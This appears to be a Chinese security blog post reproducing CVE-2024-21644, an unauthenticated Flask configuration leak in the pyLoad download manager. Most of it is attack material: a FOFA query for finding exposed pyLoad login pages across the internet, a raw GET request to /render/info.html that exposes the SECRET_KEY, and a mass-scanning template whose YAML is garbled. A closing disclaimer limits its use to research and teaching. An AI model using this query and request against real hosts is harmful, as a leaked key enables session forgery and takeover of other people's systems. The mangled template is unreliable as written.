漏洞简介
pyLoad是一个用Python编写的免费开源下载管理器,旨在通过Web进行极其轻量级,易于扩展和完全管理,不仅可以下载直接链接,还可以从许多网站下载。其接口/render/info.html存在敏感信息泄露漏洞,可被攻击者利用进一步接管系统平台。
漏洞复现
第一步、使用下面fofa语句进行资产收集...确认测试目标
fofa语句
title="Login-pyLoad"
第二步、访问网站首页
第三步、拼接poc路径进行访问
GET /render/info.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
批量脚本
id: CVE-2024-21644
info:
name: pyLoad Flask Config - Access Control
ly :
severity: high
description: |
pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
reference:
https://github.com/advisories/GHSA-mqpq-2p68-46fv
https://github.com/fkie-cad/nvd-json-data-feeds
https://nvd.nist.gov/vuln/detail/CVE-2024-21644
classification:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N :
7.5 :
CVE-2024-21644 :
CWE-284 :
0.00186 :
0.56007 :
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
verified: true
1 :
vendor: pyload
product: pyload
html:"pyload" :
app:"pyLoad" :
tags: cve,cve2024,python,pip,pyload,access-control
http:
method: GET
path:
"{{BaseURL}}/render/info.html"
and :
matchers:
type: word
part: body
words:
"'SECRET_KEY':"
"'pyload_session'"
condition: and
type: status
status:
200
原文始发于微信公众号(揽月安全团队):pyLoad 未经身份验证的 Flask 配置泄漏漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论